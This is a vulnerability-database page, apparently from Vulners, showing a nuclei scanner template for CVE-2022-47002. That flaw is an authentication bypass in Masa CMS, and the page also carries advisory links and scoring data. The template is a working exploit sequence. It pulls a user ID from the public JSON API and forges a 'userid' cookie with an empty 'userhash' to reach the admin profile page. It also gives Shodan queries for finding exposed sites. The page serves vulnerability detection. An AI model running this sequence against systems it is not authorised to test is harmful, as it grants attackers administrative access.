Lucene search
K

Masa CMS - Authentication Bypass

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

Masa CMS 7.2, 7.3, and 7.4-beta authentication bypass allows unauthorized access to sensitive information, leading to potential system compromise. Apply vendor's security patch or update

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-47002
1 Feb 202314:15
attackerkb
Circl
CVE-2022-47002
1 Feb 202316:14
circl
CNNVD
Masa CMS 安全漏洞
1 Feb 202300:00
cnnvd
CVE
CVE-2022-47002
1 Feb 202300:00
cve
Cvelist
CVE-2022-47002
1 Feb 202300:00
cvelist
NVD
CVE-2022-47002
1 Feb 202314:15
nvd
Prion
Authentication flaw
1 Feb 202314:15
prion
Positive Technologies
PT-2023-15129 · Masacms · Masacms
1 Feb 202300:00
ptsecurity
RedhatCVE
CVE-2022-47002
23 May 202500:15
redhatcve
Tenable Nessus
Masa CMS < 7.2.5 / 7.3.x < 7.3.10 Authentication Bypass
29 Jan 202500:00
nessus
Rows per page
id: CVE-2022-47002

info:
  name: Masa CMS - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS.
  reference:
    - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
    - https://github.com/MasaCMS/MasaCMS/releases/tag/7.3.10
    - https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-47002
    - https://www.hoyahaxa.com/2023/01/preliminary-security-advisory.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-47002
    cwe-id: CWE-863
    epss-score: 0.06253
    epss-percentile: 0.92679
    cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: masacms
    product: masacms
    shodan-query:
      - 'Generator: Masa CMS'
      - "generator: masa cms"
  tags: cve,cve2022,auth-bypass,cms,masa,masacms,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
        Host: {{Hostname}}
        Cookie: userid={{uuid}}; userhash=

    redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3,"\"userid\"")'
        condition: and

      - type: word
        part: body_3
        words:
          - "Edit Profile"

    extractors:
      - type: regex
        name: siteid
        group: 1
        regex:
          - 'siteid:"(.*?)"'
        internal: true
        part: body

      - type: regex
        name: uuid
        group: 1
        regex:
          - '"lastupdatebyid":"([A-F0-9-]+)"'
        internal: true
        part: body
# digest: 490a00463044022007fae6361feef43854293eea81f8a9faed18f6bf1be4774726d6bd938f0cc6f302204c95725011109d2b64e2d754d4d115268bed63d5e355ccd27d604ec3255a60f4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.06253
49